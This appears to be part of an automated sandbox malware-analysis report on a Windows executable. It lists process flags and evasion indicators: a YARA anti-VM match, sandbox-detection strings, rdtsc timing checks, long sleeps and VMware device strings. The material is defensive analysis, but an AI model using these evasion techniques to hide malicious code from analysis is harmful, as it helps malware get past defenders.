Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: H4vBtZsi8xAKaMm.exe PID: 6364, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000AA9904 second address: 0000000000AA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000AA9B6E second address: 0000000000AA9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe TID: 6476 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00409AA0 rdtsc 14_2_00409AA0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 9.6 %
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000F.00000000.386697786.0000000008C73000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000F.00000000.352237691.0000000008A32000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000001E.00000003.560476298.000000000AA58000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9Tm\Device\HarddiskVolume2\??\Volume{ef47ea26-ec76-4a6e-8680-9e53b539546d}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:-0330-11EB-90E6-ECF4BB82F7E0}
Source: explorer.exe, 0000000F.00000000.386974871.0000000008DB8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000001E.00000002.606719238.000000000AAF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.569107204.000000000D827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000001E.00000002.604249591.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 0000001E.00000002.603447661.00000000053DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000000.386085770.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000001E.00000002.604249591.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}57
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BlnAO
Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000002.612089074.000000000D80B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}V
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000001E.00000003.546950960.000000000A983000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001E.00000003.565863897.000000000D815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000001E.00000003.565863897.000000000D815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000u@v
Source: explorer.exe, 0000001E.00000002.607598476.000000000ABDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00\
Source: explorer.exe, 0000001E.00000003.585529071.000000000DDE9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\luc6-96e00#{6b2-8bAGe62-80}#4063d0c9?\luc6-96e00#{6b2-8bAGe62-80}#1063d0c9\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bd
Source: explorer.exe, 0000000F.00000000.388195555.000000000EE0C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.569973549.000000000D998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
Source: explorer.exe, 0000001E.00000003.570376867.000000000AC45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}UU}h@
Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000001-5
Source: explorer.exe, 0000001E.00000002.604249591.000000000739F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bgo<L
Source: explorer.exe, 0000001E.00000003.565231882.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAL
Source: explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001
Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.565863897.000000000D815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00E
